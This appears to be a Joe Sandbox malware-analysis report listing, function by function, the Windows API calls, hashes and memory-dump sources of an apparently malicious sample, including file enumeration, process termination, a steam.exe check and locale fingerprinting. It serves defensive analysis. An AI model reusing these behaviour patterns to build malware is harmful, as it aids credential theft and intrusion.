                          • Instruction ID: 2eefe9323e97de7eccaf1195220483f4b4dc699f095d9f4b915c97cc41a56ca3
                          • Opcode Fuzzy Hash: 8112e7c444b8cf2aee27c097680808b390b4b45d6d5a732a649071425be993f4
                          • Instruction Fuzzy Hash: 39A24871E0125DDBDB14DBA8C8807EDBBB6BF48300F1481AAD619A7341DB786E85CF91
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E23D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E23F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E2402
                          • lstrlen.KERNEL32(\*.*), ref: 007E240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 007E2436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E2486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 25410a3a81dac2a17216732d414ac69de4408c0d8dde661de12ca0a3f767663f
                          • Instruction ID: 5529e3e644aed07a4f5e6e3034e216c8061c7fddfd2ef664181c82af94dca93e
                          • Opcode Fuzzy Hash: 25410a3a81dac2a17216732d414ac69de4408c0d8dde661de12ca0a3f767663f
                          • Instruction Fuzzy Hash: 99413031611259CBCB22EF65DD89B9E77B8EF65304F00A125BC59A7253CB789C038B91
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F46B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 007F46C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F46DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 007F46ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F4702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F4711
                          • CloseHandle.KERNEL32(00000000), ref: 007F4718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F4726
                          • CloseHandle.KERNEL32(00000000), ref: 007F4731
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 39d1668e8233b340eed8ed000cf1a7996e10eb6b9446e0bef260272ffa7f1f1b
                          • Instruction ID: e1bec678cb43ed57d7ba1d98dead5b33d281b66c97a49ebb6238513c8d96aba4
                          • Opcode Fuzzy Hash: 39d1668e8233b340eed8ed000cf1a7996e10eb6b9446e0bef260272ffa7f1f1b
                          • Instruction Fuzzy Hash: DF01AD3160112DABE720ABA09C8CFFB377CAB49B51F004098FA49D1181EF7899838A75
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )@_$+< $BR?~$Gw_r$IMO$q!.p$A}[$EV\$Fw
                          • API String ID: 0-3673220929
                          • Opcode ID: ba1bec5a60e1d683f979a26b2d6d9f071537cfd9ceb89fd26cc247dde319bb3d
                          • Instruction ID: 49cedb180cb07981c4cc32c114ee3b1f2e08bfaab5817959059d12c3ab78f416
                          • Opcode Fuzzy Hash: ba1bec5a60e1d683f979a26b2d6d9f071537cfd9ceb89fd26cc247dde319bb3d
                          • Instruction Fuzzy Hash: 04B2F6F360C2009FE704AE2DEC8567ABBE6EFD4720F16893DE6C4C7744E63558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .,v=$6,;$D@s=$N,8j$^0P$g7w$tS=~$t_$%o
                          • API String ID: 0-1453195210
                          • Opcode ID: 5c229e0b398a96cf1928b5c8e2849a717f43dbfca9506e732fee528a9624ee8d
                          • Instruction ID: c4faf9bdfb0e0386949b46f2020460cb7a0efeff7eb8ad095de202bfa1e99206
                          • Opcode Fuzzy Hash: 5c229e0b398a96cf1928b5c8e2849a717f43dbfca9506e732fee528a9624ee8d
                          • Instruction Fuzzy Hash: 30B208F390C204AFE3046E2DEC8567AFBE9EF94720F1A493DEAC4C3744E63558158696
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 007F4628
                          • Process32First.KERNEL32(00000000,00000128), ref: 007F4638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 007F4660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F4672
                          • CloseHandle.KERNEL32(00000000), ref: 007F467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: 5b7823ad52743ab3adecf7812714a60d1ac53d36ce79efd14fcf6220ccb14992
                          • Instruction ID: f6447835191400ba5a8c5068efb121b98f7cb8b74d445e3bce624dd17bbb35a6
                          • Opcode Fuzzy Hash: 5b7823ad52743ab3adecf7812714a60d1ac53d36ce79efd14fcf6220ccb14992
                          • Instruction Fuzzy Hash: F4014F7160212C9BE720DFA0AC49FEB77ACEF09750F0441D5FA48D1141EF789A968AE5
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E4B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4B7F
                          • lstrlen.KERNEL32(00804CA8), ref: 007E4B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4BA7
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007E4BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E4BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: 284d25f4ed2675a0f542f863aef46acf692b260e2479c75aaed0e13760d51ef5
                          • Instruction ID: ebce36a710f7b377654a9728c75301b40a905dc9037dcbedfeb3e92f0a39252d
                          • Opcode Fuzzy Hash: 284d25f4ed2675a0f542f863aef46acf692b260e2479c75aaed0e13760d51ef5
                          • Instruction Fuzzy Hash: 7C310C71621569DBC722EF65EC89B9E77B9EFA4300F005125F815A7362CB38EC038B90
                          APIs
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 007F2D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 007F2DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 007F2DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007F2DEC
                          • LocalFree.KERNEL32(00000000), ref: 007F2FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 196ce08b6c2ed6a25acc313d92ab98887466908b2c3344ddf7dd9627f4b76006
                          • Instruction ID: ff824ba220c4c1ef32269350eaae1ff3cadf8db1fce4b47b076eda12b847ed1a
                          • Opcode Fuzzy Hash: 196ce08b6c2ed6a25acc313d92ab98887466908b2c3344ddf7dd9627f4b76006
                          • Instruction Fuzzy Hash: 7CB1E571A10209CFD755CF58C948BAAB7F1FB44325F29C1A9D5089B3A2D77A9D83CB80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: R_y$ x%$%zm$'0_v$9P|$?&[?$FAO
                          • API String ID: 0-3760677280
                          • Opcode ID: c38453df3ea84adc476ed4e7c39c19663c98d47900d935c547ce654eab4a3380
                          • Instruction ID: 51303d31613612741fa58cf17a618e2e01fcd283925369fe8eeda1bd93d28126
                          • Opcode Fuzzy Hash: c38453df3ea84adc476ed4e7c39c19663c98d47900d935c547ce654eab4a3380
                          • Instruction Fuzzy Hash: 48B218F3A0C6009FE7046E2DEC8567ABBE9EFD8720F1A453DE6C4C3744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -u?$;<Uv$OwW$p+_{$p+_{$We
                          • API String ID: 0-3798403636
                          • Opcode ID: 7546a7ca975ebd978af305633bb47bdaf67044e96946666d72c857374bcf7f3f
                          • Instruction ID: d5627d3fe88a6a786fc162aa47ceb7770eedc07cadd4c5978ffad4698440346c
                          • Opcode Fuzzy Hash: 7546a7ca975ebd978af305633bb47bdaf67044e96946666d72c857374bcf7f3f
                          • Instruction Fuzzy Hash: 09B206F36082049FE304AE2DEC8577ABBE9EF94720F16853DE6C4C7744EA3598058697
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007F2C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F2C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 007F2C58
                          • wsprintfA.USER32 ref: 007F2C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: b4c701853179f29713032c24d0d6b271416b2a182c38eb7ce63346bf1caa7c91
                          • Instruction ID: afbc9fe926b968b84fdd22876ea48f46ee5523647160a6a372800b06c84ee75c
                          • Opcode Fuzzy Hash: b4c701853179f29713032c24d0d6b271416b2a182c38eb7ce63346bf1caa7c91
                          • Instruction Fuzzy Hash: 60012BB1A40608ABDB18CF98DC09F6FB76DEB84721F004329F915D77C0D77419018AE1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
